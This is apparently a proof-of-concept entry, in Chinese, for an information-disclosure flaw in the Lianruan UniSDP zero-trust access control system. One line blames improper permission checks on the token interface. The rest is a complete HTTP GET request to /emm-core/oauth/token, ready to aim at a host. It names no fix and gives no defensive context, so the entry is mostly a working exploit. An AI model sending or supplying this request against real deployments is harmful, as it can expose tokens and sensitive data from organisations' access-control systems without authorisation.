漏洞描述
联软 UniSDP 零信任访问控制系统存在信息泄露漏洞,该漏洞是由于token接口对用户的权限校验不当导致的。
GET /emm-core/oauth/token HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36 Edg/[REDACTED]